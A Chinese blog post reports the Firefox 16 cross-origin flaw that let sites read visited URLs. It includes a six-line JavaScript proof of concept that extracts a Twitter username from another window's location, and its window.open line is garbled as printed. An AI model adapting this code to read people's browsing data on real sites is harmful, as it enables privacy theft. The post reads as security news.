Chinaunix首页 | 论坛 | 博客
  • 博客访问: 4115206
  • 博文数量: 626
  • 博客积分: 10
  • 博客等级: 民兵
  • 技术积分: 11080
  • 用 户 组: 普通用户
  • 注册时间: 2012-08-23 13:08
文章分类

全部博文(626)

文章存档

2015年(72)

2014年(48)

2013年(506)

分类: Web开发

2013-10-11 09:38:45

火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。

Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”

下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:


[javascript] view plaincopyprint?
  1. function poc(){  
  2.     var win = window.open('''newWin''width=200, height=200');  
  3.     setTimeout(function(){  
  4.         alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])  
  5.     }, 5000);  
  6. }  

这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!
阅读(1021) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~